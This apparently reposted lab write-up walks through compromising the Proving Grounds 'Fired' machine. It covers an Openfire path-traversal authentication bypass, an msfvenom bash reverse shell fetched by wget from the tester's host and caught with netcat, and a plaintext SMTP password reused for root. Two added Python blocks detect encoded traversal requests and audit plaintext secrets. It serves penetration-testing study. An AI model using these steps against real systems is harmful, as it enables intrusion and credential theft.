Proving Grounds Fired Linux Lab ( ROAD TO OSCP )
Summary: The article walks through a penetration test of a Linux lab environment. An nmap scan reveals the open ports and services; a path traversal vulnerability in Openfire CMS is used to gain access and a reverse shell is uploaded to take control. Finally, password information extracted from a log file is used to escalate privileges to root. 2026-2-13 07:3:43 Author: infosecwriteups.com (view original)


As always in a penetration testing engagement, we start with reconnaissance and information gathering; in this step we try to collect as much information about the target as possible.

We can achieve that with a variety of tools and techniques, such as enumeration, scanning and other recon methods, and use what we learn to obtain a foothold on the target.

In this lab we are tasked with pentesting the Linux machine "Fired" on Offsec's Proving Grounds:

The first step is to check that the target is up and running. We can do so by sending ICMP echo requests to confirm we can communicate with it:

ping 192.168.238.96


Next I’ll run an initial scan with nmap to scan for open ports and services:

nmap -T4 -F 192.168.238.96

I can see that port 22 is open and running SSH. Let's run a full nmap scan to make sure we are not missing anything:

nmap -sC -sV -p- 192.168.238.96 -oA full -v

Other than SSH I found two open ports :

Port 9091 and Port 9090.

Port 9091 serves what looks like an empty web page, but 9090 is running a CMS called Openfire, version 4.7.3. Let's search for this version and see whether it is exploitable.


After searching the CMS service and the version number I found the following vulnerability that affects the target:

The vulnerability lies within the web-based Admin Console, permitting a path traversal attack through the setup environment. This flaw allows unauthenticated users to access restricted pages intended only for administrative users within an already configured Openfire environment.

While Openfire had path traversal protections, it failed to defend against certain non-standard URL encoding for UTF-16 characters, not supported by the embedded webserver in use at that time. The subsequent upgrade of the embedded webserver introduced support for this non-standard encoding, which the existing path traversal protections did not cover.

Moreover, Openfire’s API allowed exclusion of certain URLs from web authentication using wildcard patterns, such as the login page. This combination of wildcard pattern matching and the path traversal vulnerability enabled malicious users to bypass authentication requirements for Admin Console pages.

This vulnerability impacts all Openfire versions released after April 2015, commencing from version 3.10.0. The issue has been patched in releases 4.7.5 and 4.6.8. Further enhancements are slated for the forthcoming version on the 4.8 branch (expected as version 4.8.0).
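The advisory text above describes two ingredients: an authentication exclusion expressed as a wildcard pattern, and a traversal protection that inspected the request path before a non-standard encoding had been decoded. The following Python is an added example written for this write-up, not code from the article or from the Openfire project. It models a weak filter that matches the exclusion list against the raw path next to a hardened filter that fully decodes (standard %XX and the %uXXXX UTF-16 style the advisory refers to) and canonicalizes the path first, then runs both over constructed access-log lines to show which requests the weak filter would have waved through. The exclusion patterns, page names and log lines are all assumptions.

```python
import re
import posixpath
from urllib.parse import unquote

# Constructed sample access-log lines (not from the lab). The last two carry encoded
# '..' segments; the third uses the non-standard %uXXXX form that unquote() ignores.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Feb/2026:07:03:43 +0000] "GET /login.jsp HTTP/1.1" 200 1024
192.0.2.10 - - [13/Feb/2026:07:03:44 +0000] "GET /setup/index.jsp HTTP/1.1" 200 2048
192.0.2.55 - - [13/Feb/2026:07:03:45 +0000] "GET /setup/%u002e%u002e/admin-only.jsp HTTP/1.1" 200 4096
192.0.2.55 - - [13/Feb/2026:07:03:46 +0000] "GET /setup/..%2f..%2fadmin-only.jsp HTTP/1.1" 200 4096
"""

# Paths excluded from authentication by wildcard (assumed list, modelled on the advisory).
AUTH_EXCLUSIONS = ("/login.jsp", "/setup/*")

_U_ENC = re.compile(r"%u([0-9a-fA-F]{4})")
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_path(raw):
    """Decode %uXXXX and %XX sequences repeatedly until the path stops changing.

    The loop is bounded so double- or triple-encoded input converges without spinning."""
    path = raw
    for _ in range(5):
        nxt = _U_ENC.sub(lambda m: chr(int(m.group(1), 16)), path)
        nxt = unquote(nxt)
        if nxt == path:
            break
        path = nxt
    return path


def canonical(path):
    """Resolve '.' and '..' segments the way the servlet container or file system would."""
    return posixpath.normpath("/" + path.lstrip("/"))


def matches_exclusion(path):
    """Wildcard match against the exclusion list (trailing '*' means prefix match)."""
    for pattern in AUTH_EXCLUSIONS:
        if pattern.endswith("*"):
            if path.startswith(pattern[:-1]):
                return True
        elif path == pattern:
            return True
    return False


def naive_is_unauthenticated_allowed(raw_path):
    """The weak check: the exclusion list is matched against the raw request path."""
    return matches_exclusion(raw_path)


def hardened_is_unauthenticated_allowed(raw_path):
    """Decode every encoding, canonicalize, and only then consult the exclusion list."""
    return matches_exclusion(canonical(decode_path(raw_path)))


def find_bypass_attempts(log_text):
    """Return raw request paths the naive filter allows but the hardened one rejects."""
    hits = []
    for line in log_text.splitlines():
        m = _REQ.search(line)
        if not m:
            continue
        raw = m.group(1).split("?", 1)[0]
        if naive_is_unauthenticated_allowed(raw) and not hardened_is_unauthenticated_allowed(raw):
            hits.append(raw)
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print("exclusion bypass attempt:", hit, "->", canonical(decode_path(hit)))
```

The same decode-then-canonicalize step is what a defender would want both in the access-control filter and in any log review: matching exclusions on the raw string is exactly the gap the advisory describes, and the log scan flags the two traversal requests while leaving the legitimate /setup/index.jsp and /login.jsp requests alone.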


The exploit generated a username and password that I could use to log in:


Another exploit was found that covers the next steps:

The second step is to upload a JAR plugin file through the management portal:


After uploading the jar plugin file, I was able to login to the management tool from Server Settings → Management tool.

From there I can switch to System command from the upper right corner. First I generate a bash reverse shell payload with msfvenom:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.45.240 LPORT=9001 -f raw > reverse.sh

Then I serve the file from my Kali machine with Python's built-in HTTP server on port 8000:

python -m http.server 8000

Since we can execute system commands on the target web server, the next step is to transfer the file onto the server with the following command:

wget http://192.168.45.240:8000/reverse.sh -O /tmp/reverse.sh

And then mark it executable:

chmod +x /tmp/reverse.sh

After I do that I’ll run a listener on port 9001:

nc -lnvp 9001

And execute the revshell :

/bin/bash /tmp/reverse.sh


After getting the user flag it's time to escalate our privileges and get root. I ran linpeas as usual for privilege escalation and found two writable files:

SELinux support: yes
Writable: /var/log/openfire/openfire.log
Writable: /var/lib/openfire/embedded-db/openfire.log

I’ll investigate them next.

In the /var/lib/openfire/embedded-db directory I examined the logs and the files and found interesting information:

I ran the following command against openfire.script:
cat openfire.script | grep "password"

And got the following credential :

From the values we can see that it's mentioning mail.smtp.password; however, there was no SMTP service running, so I tried the password to authenticate as root and it worked!
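Two findings from the escalation deserve a defender's check: the linpeas output above shows Openfire's embedded-db files writable by the service account, and the HSQLDB script file carries plaintext properties such as mail.smtp.password that were reused for root. The Python below is an added example written for this write-up, not code from the article or from Openfire. It audits an embedded-db directory for credential-like properties and for world-readable or world-writable files, running against a constructed openfire.script whose INSERT INTO OFPROPERTY layout and values are assumptions rather than content from the lab; demo() builds a throwaway directory so it runs stand-alone.

```python
import os
import re
import stat
import tempfile

# Constructed sample in the shape of an HSQLDB script file (assumed layout; values made up).
SAMPLE_SCRIPT = """\
CREATE TABLE OFPROPERTY(NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.domain','fired.example',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.username','alerts@fired.example',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.password','REDACTED-EXAMPLE',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','REDACTED-EXAMPLE-KEY',0,NULL)
"""

# Property names that usually hold a credential; extend for your own deployment.
SECRET_NAME = re.compile(r"(password|passwd|secret|token|apikey)", re.IGNORECASE)
PROPERTY_ROW = re.compile(r"INSERT INTO OFPROPERTY VALUES\('([^']*)','([^']*)'")


def find_secret_properties(script_text):
    """Return (name, masked_value) for every property whose name looks like a credential.

    Only the first two characters of the value are kept so a report never re-leaks it."""
    found = []
    for line in script_text.splitlines():
        m = PROPERTY_ROW.match(line)
        if m and SECRET_NAME.search(m.group(1)):
            name, value = m.group(1), m.group(2)
            found.append((name, value[:2] + "*" * max(len(value) - 2, 0)))
    return found


def world_accessible(path):
    """List the 'other' permission bits that let any local user read or change the file."""
    mode = os.stat(path).st_mode
    issues = []
    if mode & stat.S_IROTH:
        issues.append("world-readable")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues


def audit_embedded_db(directory):
    """Audit the script and log file: loose permissions plus plaintext secrets in the script."""
    report = {}
    for fname in ("openfire.script", "openfire.log"):
        path = os.path.join(directory, fname)
        if not os.path.exists(path):
            continue
        entry = {"permissions": world_accessible(path), "secrets": []}
        if fname.endswith(".script"):
            with open(path) as fh:
                entry["secrets"] = find_secret_properties(fh.read())
        report[fname] = entry
    return report


def demo():
    """Create a temporary embedded-db directory from the constructed sample and audit it."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "openfire.script")
    with open(script, "w") as fh:
        fh.write(SAMPLE_SCRIPT)
    os.chmod(script, 0o644)  # readable by every local user: the weak setting
    log = os.path.join(d, "openfire.log")
    open(log, "w").close()
    os.chmod(log, 0o666)     # world-writable, mirroring the linpeas finding above
    return audit_embedded_db(d)


if __name__ == "__main__":
    for fname, entry in demo().items():
        print(fname, entry["permissions"])
        for name, masked in entry["secrets"]:
            print("  plaintext credential property:", name, "=", masked)
```

Running demo() reports mail.smtp.password and passwordKey as plaintext credential properties and flags the loose modes on both files; on a real host the fixes are restricting the embedded-db directory to the service account (0o600 on the files), not reusing application passwords for system accounts, and using Openfire's encrypted-property support rather than storing secrets in clear.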

And here I can conclude the write-up. If you like what you read, please support me by sharing this article with others and clapping as much as you can; it's really appreciated and helps me as a writer to stay motivated and keep bringing you more content!

Thanks & Cheers!

Happy hacking!


Source: https://infosecwriteups.com/proving-grounds-fired-linux-lab-road-to-oscp-b116248d7b63?source=rss----7b722bfd1b8d---4